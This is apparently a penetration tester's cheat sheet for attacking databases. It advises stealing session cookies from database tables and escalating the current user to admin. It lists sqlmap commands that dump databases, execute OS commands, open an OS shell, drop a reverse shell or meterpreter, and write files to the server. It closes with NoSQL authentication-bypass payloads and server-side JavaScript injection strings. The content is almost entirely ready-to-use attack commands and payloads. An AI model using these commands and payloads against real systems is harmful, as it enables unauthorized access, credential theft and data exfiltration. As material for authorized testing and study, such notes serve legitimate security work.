Databases
Basic Reconnaissance
Tips
If a database has a sessions table, one can try to steal cookies or other credentials from it to authenticate as another user.
If one has write access to a database and roles are assigned to users, give the current user admin rights.
SQL Injection Cheat Sheets
Universal Structures
information_schema: metadata for all databases and tables
information_schema.schemata: databases
information_schema.tables: tables
information_schema.columns: columns
sqlmap
GET
Discover injectable parameters in web applications and dump data from the backing database
sqlmap -u <URL> --batch
POST
# With a request file
# Save the raw request into a file (from Burp or Chrome) and pass it with -r
sqlmap -r <request_file> --batch
sqlmap -u <URL> --data "username=*&password=*"
Web sockets
sqlmap -u ws://<ip>:<port> --data <data>
Commands
To get data from any query, add the --dump option.
# Get all databases
sqlmap -u <URL> --dbs
# Set DBMS
sqlmap -u <URL> --dbms="dbms"
# Database
sqlmap -u <URL> -D <database>
# Tables
sqlmap -u <URL> --tables -D <database>
## Specify table
sqlmap -u <URL> -D <database> -T <table>
# Columns
sqlmap -u <URL> --columns -D <database> -T <table>
Shell
To get an upload web interface, look for "file stager" in the output; otherwise look for "backdoor".
# Exec command
sqlmap -u <URL> --os-cmd <command>
# Simple Shell
sqlmap -u <URL> --os-shell
# Dropping a reverse-shell / meterpreter
sqlmap -u <URL> --os-pwn
File Upload
sqlmap -u <URL> --data <data> --file-write <local_file> --file-dest <destination>
References
NoSQL
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
Authentication Bypass
DATA
username[$ne]=toto&password[$ne]=toto
login[$regex]=a.*&pass[$ne]=lol
login[$gt]=admin&login[$lt]=test&pass[$ne]=1
login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
JSON
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
{"username": {"$gt":""}, "password": {"$gt":""}}
SSJI
';return 'a'=='a' && ''=='
";return 'a'=='a' && ''=='
0;return true
NoSQLMap
Since the tool uses a menu-based system, I'll just link the GitHub: Documentation and Release